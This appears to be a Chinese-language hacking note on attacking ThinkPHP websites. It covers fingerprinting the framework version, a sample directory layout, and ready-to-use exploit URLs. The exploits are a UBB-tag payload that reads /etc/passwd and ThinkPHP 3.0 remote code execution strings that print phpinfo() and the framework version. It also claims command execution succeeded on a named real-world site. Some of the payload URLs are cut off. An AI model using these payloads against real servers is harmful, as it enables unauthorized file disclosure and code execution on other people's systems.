首先確定這個網站使用thinkphp的框架
國內很多php開源項目的代碼都是使用thinkphp框架編寫的,但是thinkphp框架有很多版本,如何才能知道我們使用的框架是哪個版本的呢?
在URL后面加thinkphp的目錄,也有可能爆出來
這是一個tankphp的網站目錄。供參考
-
admin是后台工程文件夾
-
home是前台工程
-
public里面用於存放CSS文件,JS文件以及網頁里面的圖片
-
ThinkPHP框架
-
ueditor是百度編輯器
ThinkPHP的Ubb標簽漏洞讀取任意內容
localhost/index/?path=[code]/etc/passwd[/code]
附圖
hinkphp 3.0 爆路徑漏洞
1. thinkphp3.0 模塊加載失敗,出錯信息爆應用程序路徑。
檢測有兩種情況
1. 可執行命令,這個估計是偽3.0版本?
交大定票
此站到可以執行命令
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
可查看版本
http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D
可查看phpinfo信息
2. 不可執行命令,爆路徑
http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7
http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D